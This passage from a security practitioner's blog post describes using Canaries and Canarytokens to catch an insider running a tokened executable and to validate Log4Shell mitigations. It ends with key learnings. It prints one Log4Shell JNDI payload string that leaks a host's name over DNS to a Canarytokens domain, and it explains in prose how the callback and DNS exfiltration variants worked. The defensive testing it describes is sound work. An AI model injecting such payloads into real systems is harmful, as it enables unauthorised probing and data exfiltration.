    What happened next was quite unexpected. An internal user with access to the location where we placed the package ran the tokened executable. It was WAY outside this user’s role to ever attempt access to this segment. So when teams worry about insider threats: this was a great real-world example of catching one. In the end, this particular employee received disciplinary action for the exploration and execution of binaries outside their described role. Within the Canary portal, or Canarytokens.org, teams can create and upload basic executable files that alert when executed, as well as when the file properties are read. This can immediately alert you to someone attempting to gain access to a more restricted area.

    Log4J Product Zero Day Detection, Remediation

    The final Canary use case I wanted to highlight is related to the Log4J vulnerability. When the Log4J vulnerability (Log4Shell) was announced in early December, our team sprang into action. What you may not have heard is the private story of how Canaries helped us validate a zero day in a product. At the time we had been working with an advanced Red Team that was struggling to gain access from an external-only vantage point. This team had the ability to create custom exploits for targets unique to their clients, so they had extensive exploit development experience. The Log4J vulnerability timeline can be seen here.

    When Log4J was suddenly announced, the Red Team reached out privately late in the afternoon on Thursday, December 9, informed us we had edge servers vulnerable to this attack, and asked if we could test and validate. This gave our team a head start in understanding the impact and urgency of this exploit.

    The initial focus was on internal applications and services. We hadn’t yet considered that this attack might affect our third-party external infrastructure. At the time, we had some early Python scripts to test and validate. Initial compromises and uses of this exploit were of the “exploit and call back” variety: you would exploit the server, and it would attempt to download a second stage. This was mitigated by our external firewall rules restricting outbound callbacks. However, over the next few days we began to see a DNS variety emerging (as depicted in the graphic above) that could exfiltrate keys or other sensitive host settings over DNS. We were able to verify that our DNS logs were accurately recording lookup attempts traceable back to endpoints as well.

    Around this time the canarytokens.org site began to publish free Log4J token strings.

    These were immediately useful for our team to test and validate the mitigations and controls we had deployed, so we created 10-12 Canarytokens to test and review settings. While this may not have been the intended use, it really helped our team isolate and contain vulnerable systems by ensuring we had a safe way to really test the exploit.

    Sample Log4J exploit, sends hostname out over DNS:
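    A token string of this kind looks something like the following (the token ID is a placeholder; vulnerable hosts interpolate the ${hostName} lookup before resolving the name, sending the hostname to the Canarytokens server over DNS):

    ```
    ${jndi:ldap://x${hostName}.L4J.<your-token-id>.canarytokens.com/a}
    ```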


    So Canarytokens for Log4Shell were immensely valuable to our security team, since we could reliably test without having to resort to sketchy public exploit code.

    Key learnings

    Each of these scenarios helped us learn how to use Canaries and tokens as part of our security practice. The key learnings are listed below in case they help you with your deployment:

    1. SSH Canary – Integrating alert data into existing tools even across teams can provide more insights than a single alert alone.
    2. Cyber Insurance Documents – Putting the context for what would constitute unauthorized access in the token comment allowed for immediate identification of malicious behavior, versus someone inadvertently opening the wrong file.
    3. Alerts that shouldn’t happen – Even for areas where you are pretty sure you have things covered, Canaries and Canarytokens are a quick way to let you know when your assumptions have broken down.
    4. Log4Shell tokens – Tokens don’t have to only be used as tripwires, they can be used as a probing mechanism to understand how your environment really works to secure accordingly.

    Closing Thoughts

    I have written here about four scenarios. I think the operational impact of Canaries cannot be overstated: for teams with limited budget and support, Canaries and Canarytokens punch well above their weight class. The alerting pipeline and infrastructure are incredibly useful as well. However, it is also important to remember that a Canary alert alone is never enough to completely convict or evict an adversary. These, in my opinion, are like smoke alarms or motion sensor alerts. It will take teams working together and ensuring their birds are cared for, tested and ready to go, much like changing the batteries in your home smoke detectors! Teams may want to periodically ensure they have what they need to respond to an alert. Even among all the other tools we had deployed, from endpoint to WAF, Canaries helped our team extend the range of our detection capabilities further into the network.

    We hope these examples spark your interest and curiosity into ways organizations are getting value from Canaries and Canarytokens.

    Thank you for reading.
